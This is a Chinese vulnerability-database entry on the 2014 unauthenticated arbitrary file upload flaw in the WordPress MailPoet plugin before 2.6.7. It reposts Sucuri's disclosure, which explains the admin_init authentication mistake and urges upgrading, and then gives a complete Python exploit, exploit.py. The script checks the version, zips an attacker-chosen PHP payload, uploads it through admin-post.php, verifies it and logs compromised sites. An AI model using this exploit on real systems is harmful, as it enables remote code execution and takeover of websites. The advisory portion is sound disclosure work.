影响系统
Wordpress MailPoet < 2.6.7
漏洞发布时间:2014-07-01
漏洞更新时间:2014-07-01
危害
远程攻击者可以利用漏洞可上传任意文件。
攻击所需条件
攻击者必须访问Wordpress MailPoet。
漏洞信息
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
Wordpress MailPoet插件/wp-admin/admin-post.php脚本存在安全漏洞,允许远程攻击者利用漏洞提交特殊请求上传任意文件。
厂商解决方案
Wordpress MailPoet 2.6.7已经修复该漏洞,建议用户下载更新:
https://wordpress.org/plugins/wysija-newsletters/
漏洞提供者
Adriano Marcio Monteiro
漏洞消息链接
http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html
Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)
Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required).
This is a serious vulnerability, The MailPoet plugin (wysija-newsletters) is a very popular WordPress plugin (over 1,700,000 downloads). This vulnerability has been patched, if you run the WordPress MailPoet plugin please upgrade ASAP!
Are you affected?
If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges/accounts on the target site. This is a major threat, it means every single website using it is vulnerable.
The only safe version is the 2.6.7, this was just released a few hours ago (2014-Jul-01).
Why is it so dangerous?
This bug should be taken seriously, it gives a potential intruder the power to do anything he wants on his victim’s website. It allows for any PHP file to be uploaded. This can allow an attacker to use your website for phishing lures, sending SPAM, host malware, infect other customers (on a shared server), and so on!!
Technical Details
Our research team discovered this flaw a few weeks ago and immediately disclosed it to the MailPoet team. They responded very well and released a patch as quickly as possible.
Because of the nature of the vulnerability, specifically it’s severity, we will not be disclosing additional technical details. The basics of the vulnerability however is something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hooks were only called when an administrator user visited a page inside /wp-admin/.
It is a easy mistake to make and they used that hook (admin_init) to verify if a specific user was allowed to upload files.
However, any call to /wp-admin/admin-post.php also executes this hook without requiring the user to be authenticated. Thus making their theme upload functionality available to everybody.
Pro-tip: If you are a developer, never use admin_init() (or is_admin()) as an authentication method.
How should you protect yourself?
Again, Update the plugin as soon as possible. Keeping WordPress and all plugins updated is the first step to keep your sites secured.
转自:http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html
————————————————————————————————————————————–
漏洞利用代码exploit.py:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from random import choice
import string
import sys
import re
from zipfile import ZipFile
from StringIO import StringIO
import requests
from colors import red, green, blue # pip install ansicolors
def version_compare(v1, v2):
def normalize(v):
return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
return cmp(normalize(v1), normalize(v2))
def create_zip_file(theme_name, payload_name, payload):
files = {
"%s/%s" % (theme_name, 'style.css'): '',
"%s/%s" % (theme_name, payload_name): payload
}
zip_file = StringIO()
with ZipFile(zip_file, 'w') as zip:
for path in files:
zip.writestr(path, files[path])
zip_file.seek(0)
return zip_file
def check(url):
readme_url = "%s/wp-content/plugins/wysija-newsletters/readme.txt" % url
res = requests.get(readme_url, timeout=15, verify=False)
if res.status_code == 200:
match = re.search("stable tag: (.*)[\r\n]", res.text, re.I)
version = match.group(1)
fun = green if version_compare(version, "2.6.7") < 0 else blue
print fun("[?] found version: %s" % version)
return version_compare(version, "2.6.7") < 0
else:
raise Exception("error getting version")
def exploit(url, payload_data):
theme_name = '.tmp' # better to keep the chaos to one directory.
payload_name = ''.join([choice(string.letters) for i in range(5)]) + ".php"
zip_file = create_zip_file(theme_name, payload_name, payload_data)
files = {'my-theme': ('%s.zip' % theme_name, zip_file, "application/x-zip-compressed")}
data = {
"action": "themeupload",
"submitter": "Upload",
"overwriteexistingtheme": "on"
}
target_url = "%s/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" % url
payload_url = "%s/%s/%s/%s" % (url, 'wp-content/uploads/wysija/themes', theme_name, payload_name)
print blue("[?] attempting to upload zip (%s)..." % target_url)
# Don't rely on checking response, have observed some strange behaviour even with successful upload
requests.post(target_url, files=files, data=data, verify=False, timeout=15)
print blue("[?] checking upload (%s)..." % payload_url)
response = requests.head(payload_url, verify=False, timeout=15)
if response.status_code == 200:
print green("[+] found: %s" % payload_url)
return payload_url
else:
raise Exception("upload failed.")
if __name__ == "__main__":
if len(sys.argv) > 2:
payload = open(sys.argv[1]).read()
wp_url = sys.argv[2]
try:
if check(wp_url):
res = exploit(wp_url, payload)
if res:
with open("found-sija.log", "a") as log:
log.write("%s\n" % res)
except Exception as e:
print red("[!] %s - %s" % (wp_url, e))
